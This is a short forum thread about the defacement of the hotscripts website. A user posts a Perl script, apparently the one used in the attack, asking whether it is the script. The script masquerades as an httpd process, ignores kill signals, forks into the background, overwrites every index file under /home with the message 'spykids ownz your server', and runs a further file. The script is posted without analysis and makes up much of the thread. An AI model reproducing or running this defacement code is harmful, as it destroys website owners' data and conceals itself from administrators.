hotscripts hacked haha!

There is definitely nothing funny about this. This is a business website. How would it make anyone here feel if they suddenly had no source of revenue?
 
No just my hate for inet I suppose. Its not funny but it is there own fault though. I hope credit cards are not stored there. :crash:
 
I did a quick search and it appeared this happened before. Instead of the current, "spykids ownz your server", it was "Hello World."
 
Fixed now :) Is this the script?

PHP:
#!/usr/bin/perl

my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";

$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

system("find /home -name index.* >> index");

open(a,"<index");
@ind = <a>;
close(a);
$b = scalar(@ind)
for($a=0;$a<=$b;$a++){
chomp;
system("echo spykids ownz your server > $ind[$a]");
}

system("perl zone.txt");
exit;
 
Last edited:
Top